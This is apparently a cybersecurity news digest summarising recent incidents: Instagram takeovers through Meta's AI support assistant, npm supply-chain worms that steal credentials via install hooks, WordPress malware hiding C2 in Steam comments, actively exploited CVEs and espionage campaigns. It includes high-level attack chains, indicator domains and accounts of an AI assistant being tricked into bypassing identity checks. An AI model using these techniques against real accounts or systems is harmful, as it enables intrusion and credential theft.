Instagram accounts were hijacked after attackers abused Meta’s AI-powered support tools to pass recovery checks and change the recovery email, creating a direct failure in automated identity verification. The abuse reportedly leveraged selfie verification and AI-generated video and could bypass 2FA, leaving victims stuck in AI-only support loops with no human escalation. Reported targets included a White House team account, Jane Manchun Wong, @hey, and @korn, and Meta said the issue had been resolved and impacted accounts were being secured.

The Instagram accounts for the Obama White House and the Chief Master Sergeant of the U.S. Space Force were briefly defaced after attackers abused Meta’s AI support assistant to reset passwords, creating a public-facing account takeover risk. The reported workflow let the attacker link a new email address and receive a reset code, which enabled the hijack and message injection. Meta reportedly pushed an emergency patch, and the exploit reportedly failed when MFA was enabled.

Bayer has shifted to psychology-first security awareness and tiered AI access controls to blunt AI-generated social engineering across employees and suppliers. The program now trains staff to spot pressure, authority abuse, and process-breaking requests instead of relying on old phishing cues like spelling mistakes or suspicious URLs. It also gates access to myGenAssist, extends AI security annexes to suppliers, and pushes the SOC toward human-on-the-loop operations.

CVE-2024-21182 in Oracle WebLogic Server is actively exploited and can let a network-access attacker achieve unauthenticated remote compromise. The flaw affects versions 12.2.1.4.0 and 14.1.1.0.0, and Shodan tracks 1,592 exposed servers online and vulnerable. Oracle released security patches in July 2024, but successful attacks can still expose critical data or grant complete access to WebLogic-accessible data.

Google's June 2026 Android security patches address 124 vulnerabilities, including an actively exploited zero-day. The release ships as the 2026-06-01 and 2026-06-05 security patch levels and covers System, Framework, and Qualcomm components. One high-severity Android Framework flaw, CVE-2025-48595, can enable code execution and privilege escalation on devices running Android 14 or later.

Google's June 2026 Android security patches now cover CVE-2025-48595, an actively exploited Android Framework flaw that can lead to code execution and privilege escalation on Android 14 or later devices. Google said the vulnerability may be under limited, targeted exploitation, making timely patching important for exposed devices. The flaw was already tracked in the March 2025 Android Security Bulletin and is now fixed in the 2026-06-01 and 2026-06-05 patch levels.

A threat actor is using AI coding tools to build and refine EDR-evasion malware, accelerating the creation of custom loaders that can bypass endpoint defenses. The lab tested the tooling against Sophos, CrowdStrike and Microsoft EDR agents, showing a concrete focus on defender evasion rather than harmless experimentation. The activity raises the speed and scale of malware development and suggests the workflow may support stealthy post-exploitation operations.

UK businesses are shifting cyber spending toward AI and advanced threat preparedness as 43% name AI-powered attacks their biggest near-term risk. The broader pattern is a high incident burden: 77% of UK businesses reported a cyber incident in the past year. Recovery remains slow even with fast detection, because 94% of incidents are identified within 24 hours but more than a quarter take over 10 days to resolve. The survey also points to a skills gap and uneven resilience maturity, leaving organizations exposed to prolonged disruption.

Red Hat's official npm namespace was hijacked in a supply chain attack that republished 32 packages in the @redhat-cloud-services scope on June 1; the malicious uploads landed in 72 seconds and used an install-time preinstall script to steal cloud, CI/CD, and npm credentials. Researchers said the payload was a variant of Mini Shai-Hulud/Miasma, and the affected package set represented about 9.8 million downloads.

The SideCopy-linked Operation XENOFISCAL spear-phishing campaign is targeting Afghanistan's Ministry of Finance and related provincial finance offices with Xeno RAT, raising the risk of host compromise across government systems. Delivery uses a ZIP archive with a malicious LNK file and a Pashto-language lure, then chains mshta.exe into an HTA fetch and in-memory JavaScript execution. The operation extends to provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level employees, showing a focused government-targeting effort.

On May 31, 2026, Dashlane disclosed that an external brute-force account attack led to encrypted vaults being downloaded for fewer than 20 personal-plan users, creating a limited but concrete exposure of sensitive stored data. The attack attempted to bypass 2FA and add new devices to existing accounts. Dashlane said affected users were notified and that vault contents still depend on the Master Password for access.

Infosecurity Europe unveiled the Cyber Startup Programme and Cyber Startups Zone to give early-stage cybersecurity companies a larger platform, helping them connect with investors and buyers ahead of Infosecurity Europe 2026. The initiative includes dedicated show-floor access, tailored ticket options, and a collaboration with UK Cyber Flywheel. It also adds a live startup award competition designed to spotlight emerging cyber products and growth potential.

The DriveSurge campaign is redirecting visitors from thousands of compromised websites to malware-delivery infrastructure, creating a broad infection path through ClickFix and FakeUpdates lures. The operation uses zTDS to profile each visitor and route them toward the lure most likely to succeed. DriveSurge is described as an initial access broker operating on a pay-per-install model, so the redirects can feed follow-on intrusions. The activity now extends beyond Windows to macOS clipboard-hijacking lures, increasing the number of endpoints at risk.

DriveSurge has shifted into an initial access broker role built around a pay-per-install (PPI) model, expanding monetized access delivery and increasing downstream intrusion risk. The actor’s use of zTDS to profile visitors and choose between FakeUpdates and ClickFix lures makes the ecosystem more efficient at turning redirected traffic into infections. The operation’s reach across thousands of compromised websites gives the model broad scale and repeatability.

A Miasma supply-chain campaign has spread through GitHub and npm abuse, compromising 309 GitHub repositories and widening the risk of credential theft across developer projects. The operation used a compromised GitHub account, malicious commits, and npm trusted publishing to push backdoored packages. Attribution remains open, but the activity shows continuity over the past couple of months and a broad developer-ecosystem footprint.

The Spanish National Police arrested a suspect in a doxxing/data-leak case that exposed personal data tied to INCIBE and other key state organizations. The probe, overseen by Madrid Investigative Court No. 22, led to a home search and seizure of computers and other electronic devices. The arrest expands the criminal investigation into a leak that authorities say created national security risks.

Spanish state entities are facing a mass leak of personal data that exposed employees and members of critical institutions and created national security risk. The records were tied to INCIBE, the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council. Published material included DNI numbers, mobile numbers, and professional email addresses, and authorities traced the activity to an operation circulating since February 2026.

Dashlane experienced a temporary account-access disruption after brute-force login attempts triggered security lockouts for some users. The affected accounts were later unsuspended, and Dashlane said there was no evidence of compromise in its systems. Some users still reported login problems while the service monitored the issue.

The TeamPCP-linked Mini Shai-Hulud campaign is a malicious npm supply-chain operation that steals developer credentials and abuses trusted publishing paths to spread trojanized packages. A new Miasma wave compromised @redhat-cloud-services npm packages to steal GitHub Actions secrets, npm tokens, cloud credentials, Kubernetes and Vault material, SSH keys, and other sensitive files from developer machines, then used preinstall hooks, encrypted exfiltration to api.anthropic[.]com:443/v1/api with GitHub fallback, and downstream propagation behavior. The activity remains active and matters because stolen tokens and pipeline access can enable self-propagation and broader compromise across developer ecosystems.

The Mini Shai-Hulud npm supply-chain malware activity now includes a Miasma variant that compromised @redhat-cloud-services packages to steal credentials and secrets from developer machines and deliver a self-propagating worm. Researchers said the campaign uses install-time execution, credential harvesting, CI/CD targeting, encrypted exfiltration, and downstream propagation, with stolen data sent to api.anthropic[.]com:443/v1/api and GitHub used as a fallback. Evidence also points to a compromised Red Hat employee's GitHub account as the injection path, and the first related commit containing "Miasma: The Spreading Blight" appeared on May 29, 2026.

A WordPress malware campaign has infected about 1,980 websites since July 2025, and it hides command-and-control (C2) data in Steam Community profile comments to reduce detection. The operation uses invisible Unicode characters to encode payloads, then directs sites to hello-mywordl[.]info to fetch injected JavaScript. It can also install a backdoor that accepts base64-encoded PHP code through POST when a specific authentication cookie is present.

A WordPress malware operation has been uncovered on approximately 1,980 websites, raising the risk of hidden command-and-control (C2) traffic and persistent page injection. The malware uses Steam Community profile comments and invisible Unicode characters to conceal payload data. It also pulls script content from hello-mywordl[.]info and can plant a backdoor on infected sites.

Microsoft is investigating an ongoing service disruption that is blocking Teams and Office for the web users from opening files, disrupting access to shared documents across multiple Office Apps. The outage affects at least Excel for the web and shows an error that Office Online services aren't available right now. Microsoft says it is working to restore service while it isolates the root cause of the issue.

A critical RCE flaw in Flowise tracked as CVE-2026-40933 lets an attacker take over self-hosted deployments when a logged-in user imports a malicious workflow file. The weakness sits in the Custom MCP tool and its stdio transport, where user-supplied commands can run on the server. Obsidian Security published working PoC code and said the disclosed fix can be bypassed. The managed Flowise Cloud service is not affected, but operators running the open-source platform should disable stdio and use SSE.

Belgium's CCB warned that CVE-2026-41089 is being actively exploited in the wild, urging admins to immediately patch vulnerable Windows servers because the flaw can enable remote code execution on domain controllers. The advisory covers Windows Netlogon, a core authentication service used in Windows domain-based networks, and the issue affects all currently supported Windows Server versions, including Windows Server 2025. Microsoft had already fixed the bug in the May 2026 Patch Tuesday release.

The Operation Dragon Weave campaign is actively targeting officials and citizens in the Czech Republic and Taiwan with spear-phishing ZIP attachments. The infection chain uses a Rust loader, DLL side-loading, and AdaptixC2 to establish remote control and support data exfiltration. The operation also reaches government, research, academic, technology, and financial services sectors. Its final-stage payload, AZUREVEIL, uses Microsoft Azure Blob Storage for dead-drop command-and-control, reducing direct attacker infrastructure exposure.

Microsoft is dealing with an ongoing outage that is blocking some users from setting up multi-factor authentication (MFA) and accessing My Sign-Ins. Affected users are seeing 504 Gateway Timeout errors on mysignins.microsoft.com, which disrupts sign-in management and access setup. Microsoft said it has failed over to alternate infrastructure and is monitoring service health while it evaluates additional mitigation.

The Linux kernel CIFS subsystem has a disclosed CIFSwitch local privilege-escalation flaw that can let an unprivileged local attacker reach root privileges by abusing request_key and cifs.upcall in the CIFS authentication flow. The issue affects multiple Linux distributions with vulnerable kernel CIFS and cifs-utils combinations, including systems where cifs-utils ships by default. Major Linux distributions have rolled out fixes, and a proof-of-concept (PoC) is available to help validate patches, mitigations, detections, and exposure.

Major Linux distributions rolled out fixes for the CIFSwitch security defect, reducing exposure to a root-privilege escalation path in the Linux kernel CIFS subsystem. The patch rollout covered multiple distributions and landed earlier this month. The defect involved the kernel’s CIFS handling and the cifs-utils helper used for authentication. Systems shipping the helper by default, or with it installed manually, faced the most direct exposure before the fixes arrived.

The GammaWorm malware activity now shows a more covert stage that hides modules in NTFS Alternate Data Streams, helping it spread across Ukrainian networks while leaving few on-disk traces. It uses fileless VBScript, scheduled tasks, and registry changes to persist, then propagates through USB sticks and network drives using malicious shortcuts. The worm also pulls C2 details from public services such as Telegram and Cloudflare, keeping the backdoor available for operator commands. The stealthier design makes detection and cleanup harder and raises the risk of repeated reinfection.